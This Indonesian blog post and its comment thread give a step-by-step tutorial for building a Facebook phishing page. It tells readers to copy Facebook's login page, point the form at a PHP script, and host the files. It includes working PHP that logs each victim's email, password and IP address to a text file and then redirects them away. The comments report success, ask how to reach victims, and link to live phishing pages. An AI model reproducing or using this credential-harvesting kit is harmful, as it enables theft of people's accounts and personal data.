Cara Hack Facebook dengan Phising

Cara Hack Facebook dengan Phising
Cara Hack Facebook dengan Phising bukanlah suatu hal yang sulit untuk kita lakukan.terlebih jika anda sedikit aja mengenal bahasa HTML.terasa akan bertambah mudah untuk kita buat tentang cara hack facebook yang satu ini.memang ada yang bilang sudah jadul tapi saya pribadi berpedapat sebaliknya.phising adalah tehnik hack facebook yang simpel,rapi,tidak memerlukan tehnik yang khusus untuk membuatnya dan sangatlah cocok untuk pemula.memanfaatkan kelengahan dan juga memancing pengguna untuk login ke halaman palsu merupakan ciri khas dari hack phising.karena facebook memiliki pengguna yang banyak maka saya jadikan sebagai contoh cara membuat Phising facebook
1.Membuat Halaman Home Page Facebook Palsu.
Silahkan kunjungi www.facebook.com atau kamu bisa mengetik alamat URL tersebut di tab baru browser computer sobat.tunggu sampai loading selesai.lalu tekan CTRL dan U secara bersamaan hingga muncul kode script halaman dari facebook.Simpan semua code tersebut ke notepad.dengan file name :index.html Save As Type : all files
Cara Hack Facebook

Setelah tersimpan di notepad sobat tekan CTRL dan F Untuk mempermudah pencariaan code : action="https://www.facebook.com/login.php?login_attempt=1" method="post"
Jika sudah ketemu hapus code tersebut ganti dengan action="login.php" method="post" dan save kembali dengan cara seperti di atas.
Cara Hack Facebook dengan Phising
Sampai di sini kita telah punya sebuah File index.html dengan action login.php
2. Membuat File Script PHP (login.php)
Script ini yang nantinya kita fungsikan untuk mengambil data input dari form login yang di masukan oleh user atau target.dan file ini harus terhubung dengan action yang ada di file index.html.karena itu kita wajib dan tax bisa di tawar lagi untuk menamai file ini dengan login.php
Save as file php di bawah ini dengan file name login.php dengan Save as type all files pada notepad sobat. <?php
$file = "logs.txt";
$username = $_POST['email'];
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR'];
$today = date("F j, Y, g:i a");

$handle = fopen($file, 'a');
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
fwrite($handle, "\n");
fwrite($handle, "Email: ");
fwrite($handle, "$username");
fwrite($handle, "\n");
fwrite($handle, "Password: ");
fwrite($handle, "$password");
fwrite($handle, "\n");
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "\n");
fwrite($handle, "Date Submitted: ");
fwrite($handle, "$today");
fwrite($handle, "\n");
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
fwrite($handle, "\n");
fwrite($handle, "\n");
fclose($handle);
echo "<script LANGUAGE=\"JavaScript\">
<!--
window.location=\"http://texass1m.16mb.com/confirmasi-texas-holdem-poker.html\";
// -->
</script>";
?>

3. Membuat file logs.txt
File ini nantinya berfungsi menyimpan data dari login.php dalam bentuk text.
Cara membuatnya ketik aja logs txt pada notepad sobat terus nama file tersebut atau file name logs.txt dan Save as type all files pada notepad sobat.
Sampai di sini kita telah selesai membuat file untuk phising facebook dan kita jadi punya 3 buah file yaitu :
• index.html
• login.php
• logs.txt
Supaya ke tiga file tersebut bekerja dengan sempurna maka anda harus punya hosting yang Suport PHP untuk upluad file tersebut.saya merekomendasikan untuk yang gratis aja dulu seperti Indhostinger silahkan baca di sini untuk cara mendaftar di indhostinger dan 000webhost silahkan baca di sini untuk Cara Daftar Webhosting di 00Webhost Free
Demikianlah Cara Hack Facebook dengan Phising Semoga ada manfaatnya.jika ada yang kurang jelas silahkan bertanya di kolom komentar siapa tahu saya bisa membantu.

Anda sedang membaca artikel tentang Cara Hack Facebook dengan Phising dan anda bisa menemukan artikel Cara Hack Facebook dengan Phising ini dengan url http://trik-hack-facebook.blogspot.com/2012/11/cara-hack-facebook-dengan-phising.html, anda boleh menyebar luaskannya atau mengcopy paste-nya jika artikel Cara Hack Facebook dengan Phising ini sangat bermanfaat bagi teman-teman anda, namun jangan lupa untuk meletakkan link Cara Hack Facebook dengan Phising sumbernya.

26 komentar:

  1. hahay, thanks gan berhasil..mau ngeberantas akun fb yg sering memuat konten2 yg gak layak buat anak2 kecil nih.se-x lg thanks.mg tambah rezekinya n dimudahkan dlm segala urusan.

    BalasHapus
    Balasan
    1. Cara penggunaannya gimana gan....????? terangin donk...

      Hapus
  2. keren gan, ane jajal dulu nih triknya..

    visit back: http://infohackomputer.wordpress.com

    BalasHapus
  3. Cara penggunaannya gimana,,,???
    semua sudah selesai, sudah buat akun di www.idhostinger.com juga. terus gimana lagi nih gan...????

    BalasHapus
  4. lho om itu step 1 semua scriptnya di copas ato cmn yg kyk ada di foto?

    BalasHapus
  5. caranya mengunakannya gimana nie gan...

    BalasHapus
  6. gan, kan punya ane misal situsane.zz.mu, kalo ane klik go kenapa connectnya ke m.facebook.com ya ? Tapi kalo ke situsane.zz.mu/save.txt bisa. Solusinya bos ?

    BalasHapus
  7. wkwkwkwkwk
    phising twitter ==> http://primadearcher.ini.my.id/twitter
    phising FB ==> http://primadearcher.ini.my.id/facebook/3

    BalasHapus
    Balasan
    1. buatnya gmn gan???

      Hapus
    2. gan punya ane udh kek gini http://preview.main-hosting.com/?__proxy_url=aHR0cDovL3FoYWxpa2VzLm5ldC8=
      gimana lagi cara selanjutnya?.

      Hapus
  8. bro udh daftar semua nih gua ... trs hrs ngapain lagi ??

    BalasHapus
  9. bro dah berhasil ni pembuatannya,trus tuk krimin kekorbanya gimna caranya gan mohon pencrahan ya..!makasi

    BalasHapus
  10. cara upload file nya gmana ?

    BalasHapus
  11. NANTI NGELIAT DATA NYA GIMANA? RESPAWN Y

    BalasHapus
  12. Izin Copas Ya gan,


    Jangan Lupa Mampir : http://dimas-h404.blogspot.com/

    BalasHapus
  13. Komentar ini telah dihapus oleh pengarang.

    BalasHapus
  14. Cara melihat email or kata sandi'nya gimana.?! :D

    BalasHapus
  15. Komentar ini telah dihapus oleh pengarang.

    BalasHapus
  16. kok email sama passwordnya kosong gan???

    BalasHapus
  17. makasih banget gan bermanfaat tipsnya . smoga sukses selalu

    BalasHapus
  18. kalo udah diaupload selanjutnya apa min..?

    trus caranya biar kita bisa liat email dan passnya gmana..?
    tolong pencerahanya..

    BalasHapus
  19. kemarin saya beli software hack facebook di www.perangkatindonesia.blogspot.com
    bisa hack sepuasnya dan dapat 23 akun facebook ..
    keren abis lah pokoknya .. coba aja masbrow ..

    www.perangkatindonesia.blogspot.com

    BalasHapus
  20. abis daftar ,terus gimana lagi gan?

    BalasHapus
  21. next phpnya g ada ya gan

    BalasHapus
  22. keren banget kakak tutorialnya
    Tolong kunjungin balik ya kakak
    www.pensilajaib-kita.blogspot.com
    makasih banyak

    BalasHapus